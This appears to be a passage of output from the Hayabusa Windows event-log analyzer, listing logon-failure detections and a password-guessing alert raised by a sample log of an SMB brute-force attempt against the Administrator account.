| 651 | 2016-09-20 01:50:06.513 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 652 | 2016-09-20 01:50:06.513 +09:00 | - | - | medium | Password Guessing Attack | [condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m | rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml | - |
| 653 | 2016-09-20 01:50:06.588 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 654 | 2016-09-20 01:50:06.637 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 655 | 2016-09-20 01:50:06.680 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 656 | 2016-09-20 01:50:06.725 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 657 | 2016-09-20 01:50:06.773 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 658 | 2016-09-20 01:50:06.816 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 659 | 2016-09-20 01:50:06.869 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 660 | 2016-09-20 01:50:06.909 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 661 | 2016-09-20 01:50:06.977 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 662 | 2016-09-20 01:50:07.008 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 663 | 2016-09-20 01:50:07.052 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 664 | 2016-09-20 01:50:07.091 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 665 | 2016-09-20 01:50:07.136 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 666 | 2016-09-20 01:50:07.169 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 667 | 2016-09-20 01:50:07.217 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 668 | 2016-09-20 01:50:07.262 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 669 | 2016-09-20 01:50:07.297 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 670 | 2016-09-20 01:50:07.343 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 671 | 2016-09-20 01:50:07.393 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 672 | 2016-09-20 01:50:07.444 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 673 | 2016-09-20 01:50:07.484 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 674 | 2016-09-20 01:50:07.520 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 675 | 2016-09-20 01:50:07.551 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 676 | 2016-09-20 01:50:07.590 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 677 | 2016-09-20 01:50:07.631 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 678 | 2016-09-20 01:50:07.663 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 679 | 2016-09-20 01:50:07.684 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 680 | 2016-09-20 01:50:07.720 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 681 | 2016-09-20 01:50:07.752 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 682 | 2016-09-20 01:50:07.796 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 683 | 2016-09-20 01:50:07.835 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 684 | 2016-09-20 01:50:07.929 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 685 | 2016-09-20 01:50:07.972 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 686 | 2016-09-20 01:50:08.000 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Unknown Reason | User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 687 | 2016-09-20 01:50:08.042 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Unknown Reason | User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 688 | 2016-09-20 01:50:08.179 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 689 | 2016-09-20 01:50:08.219 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 690 | 2016-09-20 01:50:08.335 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 691 | 2016-09-20 01:50:08.397 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 692 | 2016-09-20 01:50:08.462 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 693 | 2016-09-20 01:50:08.513 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 694 | 2016-09-20 01:50:08.545 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 695 | 2016-09-20 01:50:08.576 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 696 | 2016-09-20 01:50:08.611 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 697 | 2016-09-20 01:50:08.646 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 698 | 2016-09-20 01:50:08.693 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 699 | 2016-09-20 01:50:08.735 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 700 | 2016-09-20 01:50:08.769 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 701 | 2016-09-20 01:50:08.804 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 702 | 2016-09-20 01:50:08.839 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 703 | 2016-09-20 01:50:08.883 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 704 | 2016-09-20 01:50:08.916 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 705 | 2016-09-20 01:50:08.955 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 706 | 2016-09-20 01:50:08.992 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 707 | 2016-09-20 01:50:09.028 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 708 | 2016-09-20 01:50:09.071 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 709 | 2016-09-20 01:50:09.108 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 710 | 2016-09-20 01:50:09.144 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 711 | 2016-09-20 01:50:09.183 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 712 | 2016-09-20 01:50:09.219 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 713 | 2016-09-20 01:50:09.255 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 714 | 2016-09-20 01:50:09.291 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 715 | 2016-09-20 01:50:09.336 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 716 | 2016-09-20 01:50:09.364 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 717 | 2016-09-20 01:50:09.420 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 718 | 2016-09-20 01:50:09.455 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 719 | 2016-09-20 01:50:09.500 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 720 | 2016-09-20 01:50:09.544 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 721 | 2016-09-20 01:50:09.587 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
